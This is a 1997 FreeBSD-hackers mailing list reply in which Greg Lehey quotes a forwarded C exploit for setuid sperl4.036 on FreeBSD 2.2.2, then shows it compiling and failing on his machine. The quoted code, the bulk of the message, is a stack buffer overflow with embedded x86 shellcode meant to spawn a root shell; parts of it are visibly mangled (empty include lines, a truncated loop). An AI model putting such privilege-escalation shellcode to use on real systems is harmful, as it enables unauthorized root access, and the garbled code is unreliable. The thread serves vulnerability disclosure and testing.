From owner-freebsd-hackers Tue Aug 5 17:31:53 1997
From: Greg Lehey
Message-Id: <199708060031.KAA00549@freebie.lemis.com>
Subject: Re: Security hole script.
In-Reply-To: from "Lenzi, Sergio" at "Aug 4, 97 10:12:18 am"
To: lenzi@bsi.com.br (Lenzi, Sergio)
Date: Wed, 6 Aug 1997 10:01:08 +0930 (CST)
Cc: hackers@FreeBSD.ORG
Organisation: LEMIS, PO Box 460, Echunga SA 5153, Australia
Phone: +61-8-8388-8250
Fax: +61-8-8388-8250
Mobile: +61-41-739-7062
WWW-Home-Page: http://www.lemis.com/~grog

Lenzi, Sergio writes:
>
> Hello all.
>
> Here is the "script" that opens a hole in our FreeBSD 2.2.2...
> from a friend of mine (lgarcia@netlan.com.br)
> ---------------------------cut-------------------------------
> #include
> #include
> #include
>
> #define BUFFER_SIZE 1400
> #define OFFSET 600
>
> char *get_esp(void) {
>     asm("movl %esp,%eax");
> }
> char buf[BUFFER_SIZE];
>
> main(int argc, char *argv[])
> {
>     int i;
>     char execshell[] =
>         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
>         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
>         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
>         "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
>
>     for(i=0+1;i *(char **)&buf[i] = get_esp() - OFFSET;
>
>     memset(buf,0x90,768+1);
>     memcpy(&buf[768+1],execshell,strlen(execshell));
>
>     buf[BUFFER_SIZE-1]=0;
>
>     execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
> }
>
> ---------------------------------------------------------cut---------
>
> install this script, do a make and run it.
>
> should return a root shell.
=== grog@freebie (/dev/ttyp1) ~/src 2 -> make crackopen
gcc -g -Wall crackopen.c -lm -o crackopen
crackopen.c: In function `get_esp':
crackopen.c:10: warning: control reaches end of non-void function
crackopen.c: At top level:
crackopen.c:14: warning: return-type defaults to `int'
crackopen.c: In function `main':
crackopen.c:25: warning: implicit declaration of function `memset'
crackopen.c:31: warning: control reaches end of non-void function
=== grog@freebie (/dev/ttyp1) ~/src 3 -> crackopen
Can't open perl script "ë#^^ 1ÒVVVV1À°;N ÊRQSPëèØÿÿÿ/bin/sh4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï4οï": File name too long
Segmentation fault
=== grog@freebie (/dev/ttyp1) ~/src 4 ->

I presume this means that mine isn't vulnerable.

Greg